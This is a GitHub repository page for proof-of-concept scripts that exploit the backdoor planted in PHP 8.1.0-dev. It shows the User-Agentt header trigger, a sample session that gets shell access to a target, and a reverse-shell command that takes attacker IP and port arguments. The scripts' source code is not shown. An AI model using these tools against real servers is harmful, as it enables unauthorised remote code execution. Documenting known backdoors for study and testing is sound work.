Skip to content

flast101/php-8.1.0-dev-backdoor-rce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

64 Commits
 
 
 
 
 
 
 
 

Repository files navigation

PHP 8.1.0-dev Backdoor Remote Code Execution

PHP 8.1.0-dev Backdoor System Shell Script

docs/logo_php81.png

PHP verion 8.1.0-dev was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.

The original code was restored after the issue was discovered, but then tampered with a second time. The breach would have created a backdoor in any websites that ran the compromised version of PHP, enabling hackers to perform remote code execution on the site.

Read full article: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


POC Script

This short exploit script backdoor_php_8.1.0-dev.py uses the backdoor to provide a pseudo system shell on the host.Find it on Exploit DB.

Usage:

┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
  
Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Reverse Shell

This short exploit script revshell_php_8.1.0-dev.py gives a reverse shell on target.

Usage:

┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

docs/revshell-script.png

Be Curious, Learning is Life ! 😃